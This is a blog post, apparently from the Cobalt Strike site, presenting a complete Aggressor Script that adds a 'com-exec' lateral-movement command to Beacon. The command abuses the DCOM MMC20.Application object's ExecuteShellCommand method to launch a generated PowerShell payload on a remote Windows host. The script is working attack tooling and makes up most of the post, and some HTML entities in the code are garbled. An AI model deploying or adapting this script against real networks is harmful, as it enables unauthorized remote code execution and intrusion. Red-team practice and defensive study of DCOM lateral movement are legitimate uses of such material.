Scripting Matt Nelson’s MMC20.Application Lateral Movement Technique

This is a short blog post with a long title. A few weeks ago, Matt Nelson published Lateral Movement Using the MMC20.APPLICATION COM Object (there’s a Part 2 as well!). The post documents an option, beyond the usual suspects (e.g., services, scheduled tasks, wmi, etc.), to ask a remote system to run a process for you.

Matt Nelson’s technique calls the ExecuteShellCommand method of the MMC20.Application COM object. One of the features of COM is its ability to remotely instantiate objects and call methods on them. By calling this method remotely, we can make the target system run a command to load our agent into memory or weaken the target’s configuration for other post-exploitation options.

In this post, I will show you how to add this technique to Cobalt Strike with Aggressor Script. Aggressor Script is Cobalt Strike’s scripting language to extend the Cobalt Strike client and add bots to your engagement. Making it easy to quickly add and use new TTPs from Cobalt Strike is very much one of Aggressor Script’s goals.

Here’s a script that adds a com-exec command to Beacon. This scripted command is similar to Beacon’s existing psexec, psexec_psh, wmi, and winrm commands for lateral movement.

1# Lateral Movement alias
2# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
3 
4# register help for our alias
5beacon_command_register(&quot;com-exec&quot;, &quot;lateral movement with DCOM&quot;,
6&quot;Synopsis: com-exec [target] [listener]\n\n&quot; .
7&quot;Run a payload on a target via DCOM MMC20.Application Object&quot;);
8 
9# here's our alias to collect our arguments
10alias com-exec {
11if ($3 is $null) {
12# let the user choose a listener
13openPayloadHelper(lambda({
14com_exec_go($bid, $target, $1);
15}, $bid =&amp;amp;amp;amp;gt; $1, $target =&amp;amp;amp;amp;gt; $2));
16}
17else {
18# we have the needed arguments, pass them
19com_exec_go($1, $2, $3);
20}
21}
22 
23# this is the implementation of the attack
24sub com_exec_go {
25local('$command $script $oneliner');
26 
27# check if our listener exists
28if (listener_info($3) is $null) {
29berror($1, &quot;Listener $3 does not exist&quot;);
30return;
31}
32 
33# state what we're doing.
34btask($1, &quot;Tasked Beacon to jump to $2 (&quot; . listener_describe($3, $2) . &quot;) via DCOM&quot;);
35 
36# generate a PowerShell one-liner to run our alias
37$command = powershell($3, true, &quot;x86&quot;);
38 
39# remove &quot;powershell.exe &quot; from our command
40$command = strrep($command, &quot;powershell.exe &quot;, &quot;&quot;);
41 
42# build script that uses DCOM to invoke ExecuteShellCommand on MMC20.Application object
43$script  = '[activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;, &quot;';
44$script .= $2;
45$script .=  '&quot;)).Document.ActiveView.ExecuteShellCommand(&quot;';
46$script .= 'c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe';
47$script .= '&quot;, $null, &quot;';
48$script .= $command;
49$script .= '&quot;, &quot;7&quot;)';
50 
51# run the script we built up
52bpowershell!($1, $script);
53 
54# complete staging process (for bind_pipe listeners)
55bstage($1, $2, $3);
56}

This alias is similar to the lateral movement example in the Aggressor Script documentation. To use this alias: put the above into a script, load it, and use com-exec [target] [listener] within Beacon. If you type com-exec [target], Cobalt Strike will ask you which listener you want to use.

That’s it!

Scripting Matt Nelson’s MMC20.Application Lateral Movement Technique

Raphael Mudge

Footer Menu 1

Footer Menu 2

Footer Menu 3

Footer Menu 4

Footer Menu 5

Contact Information

Privacy Policy

Cookie Policy

Impressum